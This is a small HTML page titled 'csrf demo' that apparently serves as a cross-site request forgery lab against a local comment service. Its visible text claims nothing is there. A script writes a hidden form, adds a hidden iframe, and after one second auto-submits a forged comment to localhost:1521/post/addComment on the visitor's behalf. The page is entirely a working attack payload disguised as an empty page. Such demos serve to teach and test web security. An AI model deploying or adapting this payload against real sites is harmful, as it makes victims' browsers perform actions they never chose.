<!doctype html>
<html>
	<head>
		<meta charset="utf-8"/>
		<title>csrf demo</title>
	</head>
	<body>
		hello，这里什么也没有。
		<script>
			document.write(`
				<form name="commentForm" target="csrf" method="post" action="http://localhost:1521/post/addComment">
					<input name="postId" type="hidden" value="1">
					<textarea name="content">来自CSRF！</textarea>
				</form>`
			);

			var iframe = document.createElement('iframe');
			iframe.name = 'csrf';
			iframe.style.display = 'none';
			document.body.appendChild(iframe);

			setTimeout(function(){
				document.querySelector('[name=commentForm]').submit();
			},1000);
		</script>
	</body>
</html>
